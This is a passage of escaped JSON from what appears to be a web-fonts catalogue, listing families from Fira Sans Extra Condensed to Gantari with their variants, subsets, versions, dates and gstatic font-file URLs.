\"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPMcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda1fquv1WarE9ncg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPPcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda3QyNn3-0oEZ-a2Q.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPxcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda1fqWS3y-pGR7e2SvJQ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPPcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda3SCKn3-0oEZ-a2Q.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPxcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda1fqWZ3u-pGR7e2SvJQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPPcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda3USLn3-0oEZ-a2Q.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPxcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda1fqWA3q-pGR7e2SvJQ.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPPcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda3ViIn3-0oEZ-a2Q.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPxcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda1fqWH3m-pGR7e2SvJQ.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPPcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda3XyJn3-0oEZ-a2Q.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPxcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda1fqWO3i-pGR7e2SvJQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Fjalla One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/fjallaone/v13/Yq6R-LCAWCX3-6Ky7FAFnOZwkxgtUb8.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Fjord One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/fjordone/v21/zOL-4pbEnKBY_9S1jNKr6e5As-FeiQ.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Flamenco\",\n      \"variants\": [\n        \"300\",\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/flamenco/v18/neIPzCehqYguo67ssZ0qNIkyepH9qGsf.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/flamenco/v18/neIIzCehqYguo67ssaWGHK06UY30.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Flavors\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/flavors/v22/FBV2dDrhxqmveJTpbkzlNqkG9UY.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Fleur De Leah\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/fleurdeleah/v7/AYCNpXX7ftYZWLhv9UmPJTMC5vat4I_Gdq0.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Flow Block\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/flowblock/v7/wlp0gwfPCEB65UmTk-d6-WZlbCBXE_I.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Flow Circular\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/flowcircular/v7/lJwB-pc4j2F-H8YKuyvfxdZ45ifpWdr2rIg.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Flow Rounded\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/flowrounded/v7/-zki91mtwsU9qlLiGwD4oQX3oZX-Xup87g.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Fondamento\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/fondamento/v16/4UaHrEJGsxNmFTPDnkaJx63j5pN1MwI.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/fondamento/v16/4UaFrEJGsxNmFTPDnkaJ96_p4rFwIwJePw.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Fontdiner Swanky\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/fontdinerswanky/v19/ijwOs4XgRNsiaI5-hcVb4hQgMvCD4uEfKiGvxts.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Forum\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/forum/v16/6aey4Ky-Vb8Ew_IWMJMa3mnT.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Fragment Mono\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/fragmentmono/v1/4iCr6K5wfMRRjxp0DA6-2CLnN4RNh4UI_1U.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/fragmentmono/v1/4iC16K5wfMRRjxp0DA6-2CLnB4ZHg6cN71URtQ.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Francois One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/francoisone/v20/_Xmr-H4zszafZw3A-KPSZutNxgKQu_avAg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Frank Ruhl Libre\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/frankruhllibre/v15/j8_96_fAw7jrcalD7oKYNX0QfAnPcbzNEEB7OoicBw6bYVqQPxR2EUR_.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/frankruhllibre/v15/j8_96_fAw7jrcalD7oKYNX0QfAnPcbzNEEB7OoicBw7FYVqQPxR2EUR_.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/frankruhllibre/v15/j8_96_fAw7jrcalD7oKYNX0QfAnPcbzNEEB7OoicBw73YVqQPxR2EUR_.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/frankruhllibre/v15/j8_96_fAw7jrcalD7oKYNX0QfAnPcbzNEEB7OoicBw4bZlqQPxR2EUR_.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/frankruhllibre/v15/j8_96_fAw7jrcalD7oKYNX0QfAnPcbzNEEB7OoicBw4iZlqQPxR2EUR_.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/frankruhllibre/v15/j8_96_fAw7jrcalD7oKYNX0QfAnPcbzNEEB7OoicBw5FZlqQPxR2EUR_.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/frankruhllibre/v15/j8_96_fAw7jrcalD7oKYNX0QfAnPcbzNEEB7OoicBw5sZlqQPxR2EUR_.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Fraunces\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v26\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/fraunces/v26/6NUh8FyLNQOQZAnv9bYEvDiIdE9Ea92uemAk_WBq8U_9v0c2Wa0K7iN7hzFUPJH58nib1603gg7S2nfgRYIctxqjDvTShUtWNg.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/fraunces/v26/6NUh8FyLNQOQZAnv9bYEvDiIdE9Ea92uemAk_WBq8U_9v0c2Wa0K7iN7hzFUPJH58nib1603gg7S2nfgRYIcNxujDvTShUtWNg.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/fraunces/v26/6NUh8FyLNQOQZAnv9bYEvDiIdE9Ea92uemAk_WBq8U_9v0c2Wa0K7iN7hzFUPJH58nib1603gg7S2nfgRYIc6RujDvTShUtWNg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/fraunces/v26/6NUh8FyLNQOQZAnv9bYEvDiIdE9Ea92uemAk_WBq8U_9v0c2Wa0K7iN7hzFUPJH58nib1603gg7S2nfgRYIctxujDvTShUtWNg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/fraunces/v26/6NUh8FyLNQOQZAnv9bYEvDiIdE9Ea92uemAk_WBq8U_9v0c2Wa0K7iN7hzFUPJH58nib1603gg7S2nfgRYIchRujDvTShUtWNg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/fraunces/v26/6NUh8FyLNQOQZAnv9bYEvDiIdE9Ea92uemAk_WBq8U_9v0c2Wa0K7iN7hzFUPJH58nib1603gg7S2nfgRYIcaRyjDvTShUtWNg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/fraunces/v26/6NUh8FyLNQOQZAnv9bYEvDiIdE9Ea92uemAk_WBq8U_9v0c2Wa0K7iN7hzFUPJH58nib1603gg7S2nfgRYIcUByjDvTShUtWNg.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/fraunces/v26/6NUh8FyLNQOQZAnv9bYEvDiIdE9Ea92uemAk_WBq8U_9v0c2Wa0K7iN7hzFUPJH58nib1603gg7S2nfgRYIcNxyjDvTShUtWNg.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/fraunces/v26/6NUh8FyLNQOQZAnv9bYEvDiIdE9Ea92uemAk_WBq8U_9v0c2Wa0K7iN7hzFUPJH58nib1603gg7S2nfgRYIcHhyjDvTShUtWNg.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/fraunces/v26/6NVf8FyLNQOQZAnv9ZwNjucMHVn85Ni7emAe9lKqZTnbB-gzTK0K1ChJdt9vIVYX9G37lvd9sPEKsxx664UJf1hLTP7Wp05GNi3k.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/fraunces/v26/6NVf8FyLNQOQZAnv9ZwNjucMHVn85Ni7emAe9lKqZTnbB-gzTK0K1ChJdt9vIVYX9G37lvd9sPEKsxx664UJf1jLTf7Wp05GNi3k.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/fraunces/v26/6NVf8FyLNQOQZAnv9ZwNjucMHVn85Ni7emAe9lKqZTnbB-gzTK0K1ChJdt9vIVYX9G37lvd9sPEKsxx664UJf1gVTf7Wp05GNi3k.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/fraunces/v26/6NVf8FyLNQOQZAnv9ZwNjucMHVn85Ni7emAe9lKqZTnbB-gzTK0K1ChJdt9vIVYX9G37lvd9sPEKsxx664UJf1hLTf7Wp05GNi3k.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/fraunces/v26/6NVf8FyLNQOQZAnv9ZwNjucMHVn85Ni7emAe9lKqZTnbB-gzTK0K1ChJdt9vIVYX9G37lvd9sPEKsxx664UJf1h5Tf7Wp05GNi3k.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/fraunces/v26/6NVf8FyLNQOQZAnv9ZwNjucMHVn85Ni7emAe9lKqZTnbB-gzTK0K1ChJdt9vIVYX9G37lvd9sPEKsxx664UJf1iVSv7Wp05GNi3k.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/fraunces/v26/6NVf8FyLNQOQZAnv9ZwNjucMHVn85Ni7emAe9lKqZTnbB-gzTK0K1ChJdt9vIVYX9G37lvd9sPEKsxx664UJf1isSv7Wp05GNi3k.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/fraunces/v26/6NVf8FyLNQOQZAnv9ZwNjucMHVn85Ni7emAe9lKqZTnbB-gzTK0K1ChJdt9vIVYX9G37lvd9sPEKsxx664UJf1jLSv7Wp05GNi3k.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/fraunces/v26/6NVf8FyLNQOQZAnv9ZwNjucMHVn85Ni7emAe9lKqZTnbB-gzTK0K1ChJdt9vIVYX9G37lvd9sPEKsxx664UJf1jiSv7Wp05GNi3k.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Freckle Face\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/freckleface/v14/AMOWz4SXrmKHCvXTohxY-YI0U1K2w9lb4g.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Fredericka the Great\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/frederickathegreat/v15/9Bt33CxNwt7aOctW2xjbCstzwVKsIBVV-9Skz7Ylch2L.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Fredoka\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v9\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/fredoka/v9/X7nP4b87HvSqjb_WIi2yDCRwoQ_k7367_B-i2yQag0-mac3OryLMFuOLlNldbw.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/fredoka/v9/X7nP4b87HvSqjb_WIi2yDCRwoQ_k7367_B-i2yQag0-mac3O8SLMFuOLlNldbw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/fredoka/v9/X7nP4b87HvSqjb_WIi2yDCRwoQ_k7367_B-i2yQag0-mac3OwyLMFuOLlNldbw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/fredoka/v9/X7nP4b87HvSqjb_WIi2yDCRwoQ_k7367_B-i2yQag0-mac3OLyXMFuOLlNldbw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/fredoka/v9/X7nP4b87HvSqjb_WIi2yDCRwoQ_k7367_B-i2yQag0-mac3OFiXMFuOLlNldbw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Fredoka One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/fredokaone/v13/k3kUo8kEI-tA1RRcTZGmTmHBA6aF8Bf_.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Freehand\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"khmer\",\n        \"latin\"\n      ],\n      \"version\": \"v27\",\n      \"lastModified\": \"2022-04-21\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/freehand/v27/cIf-Ma5eqk01VjKTgAmBTmUOmZJk.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Fresca\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/fresca/v18/6ae94K--SKgCzbM2Gr0W13DKPA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Frijole\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/frijole/v14/uU9PCBUR8oakM2BQ7xPb3vyHmlI.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Fruktur\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v26\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/fruktur/v26/SZc53FHsOru5QYsMfz3GkUrS8DI.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/fruktur/v26/SZc73FHsOru5QYsMTz_MlWjX4DJXgQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Fugaz One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/fugazone/v15/rax_HiWKp9EAITukFslMBBJek0vA8A.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Fuggles\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v8\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/fuggles/v8/k3kQo8UEJOlD1hpOTd7iL0nAMaM.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Fuzzy Bubbles\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/fuzzybubbles/v5/6qLGKZMbrgv9pwtjPEVNV0F2NnP5Zxsreko.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/fuzzybubbles/v5/6qLbKZMbrgv9pwtjPEVNV0F2Ds_WQxMAZkM1pn4.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"GFS Didot\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"greek\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/gfsdidot/v15/Jqzh5TybZ9vZMWFssvwiF-fGFSCGAA.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"GFS Neohellenic\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"greek\"\n      ],\n      \"version\": \"v25\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/gfsneohellenic/v25/8QIRdiDOrfiq0b7R8O1Iw9WLcY5TLahP46UDUw.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/gfsneohellenic/v25/8QITdiDOrfiq0b7R8O1Iw9WLcY5jL6JLwaATU91X.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/gfsneohellenic/v25/8QIUdiDOrfiq0b7R8O1Iw9WLcY5rkYdr644fWsRO9w.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/gfsneohellenic/v25/8QIWdiDOrfiq0b7R8O1Iw9WLcY5jL5r37oQbeMFe985V.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Gabriela\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/gabriela/v14/qkBWXvsO6sreR8E-b_m-zrpHmRzC.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Gaegu\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"korean\",\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/gaegu/v15/TuGSUVB6Up9NU57nifw74sdtBk0x.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/gaegu/v15/TuGfUVB6Up9NU6ZLodgzydtk.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/gaegu/v15/TuGSUVB6Up9NU573jvw74sdtBk0x.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Gafata\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/gafata/v16/XRXV3I6Cn0VJKon4MuyAbsrVcA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Galada\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"bengali\",\n        \"latin\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/galada/v14/H4cmBXyGmcjXlUX-8iw-4Lqggw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Galdeano\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/galdeano/v22/uU9MCBoQ4YOqOW1boDPx8PCOg0uX.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Galindo\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/galindo/v20/HI_KiYMeLqVKqwyuQ5HiRp-dhpQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Gamja Flower\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"korean\",\n        \"latin\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/gamjaflower/v20/6NUR8FiKJg-Pa0rM6uN40Z4kyf9Fdty2ew.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Gantari\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/gantari/v1/jVyV7nvyB2HL8iZyDk4GVvSZ5MtC9g0gOz3wa5GD2qnm.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/gantari/v1/jVyV7nvyB2HL8iZyDk4GVvSZ5MtC9g2gOj3wa5GD2qnm.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/gantari/v1/jVyV7nvyB2HL8iZyDk4GVvSZ5MtC9g1-Oj3wa5GD2qnm.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/gantari/v1/jVyV7nvyB2HL8iZyDk4GVvSZ5MtC9g0gOj3wa5GD2qnm.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/gantari/v1/jVyV7nvyB2HL8iZyDk4GVvSZ5MtC9g0SOj3wa5GD2qnm.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/gantari/v1/jVyV7nvyB2HL8iZyDk4GVvSZ5MtC9g3-PT3wa5GD2qnm.ttf\",\n        \"700\": 